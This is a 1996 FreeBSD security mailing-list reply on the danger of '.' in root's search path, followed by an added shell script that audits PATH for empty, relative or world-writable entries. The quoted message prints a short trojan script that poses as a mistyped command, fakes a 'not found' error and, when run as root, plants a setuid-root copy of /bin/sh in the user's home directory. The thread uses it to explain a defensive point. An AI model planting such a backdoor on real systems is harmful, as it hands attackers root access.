From owner-freebsd-security Tue Jun 25 01:35:40 1996
Date: Tue, 25 Jun 1996 01:33:21 -0700 (PDT)
From: -Vince-
To: Joerg Wunsch
cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250758.JAA17930@uriah.heep.sax.de>
Sender: owner-security@FreeBSD.ORG

On Tue, 25 Jun 1996, J Wunsch wrote:

> As David Greenman wrote:
>
> > Actually, this particular problem can be avoided by putting "." last in
> > the search path rather than first.
>
> But only until someone drops this script e.g. into /tmp:
>
> #!/bin/sh
>
> if [ `id -u -r` = 0 ] ; then
>   (cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak;
>    chmod 04755 $HOME/.newsrc.bak) &
> fi
>
> echo "$0: not found."
> exit 1
>
>
> ...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc.

Hmmm, I never thought they can get you in the /tmp directory...

Vince
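A defensive check for the search-path problem discussed in this thread, as an added example that is not part of the original messages: it flags every PATH entry that resolves to the current directory or to a directory any local user can write to, whatever its position in the list. The helper name `audit_path` is hypothetical, and the world-writable test assumes the usual `ls -l` mode string.

```shell
#!/bin/sh
# Added example, not code from the thread. audit_path is a hypothetical helper.
# It audits a PATH string for entries where another local user could plant a
# look-alike command: empty entries, relative entries such as ".", and
# world-writable directories. The body runs in a subshell, so its variables
# do not leak. Exit status: 0 = clean, 1 = at least one finding.
audit_path() (
    rest="$1:"      # sentinel colon so a trailing empty entry is not lost
    pos=0
    findings=0
    report() { findings=$((findings + 1)); echo "entry $pos '$entry': $1"; }
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        pos=$((pos + 1))
        case $entry in
            '') report "empty entry, searched as the current directory" ;;
            /*)
                [ -d "$entry" ] || continue
                # In the ls mode string, character 9 is "write" for other.
                # -L follows a symlinked entry to the real directory.
                case $(ls -ldL "$entry") in
                    d???????w*) report "world-writable directory" ;;
                esac ;;
            *)  report "relative entry, resolved against the current directory" ;;
        esac
    done
    [ "$findings" -eq 0 ]
)

# Audit the caller's own search path when the file is run directly.
audit_path "$PATH" || true
```

The sticky bit on a directory such as /tmp does not change the result, since it restricts deleting other users' files, not creating new ones.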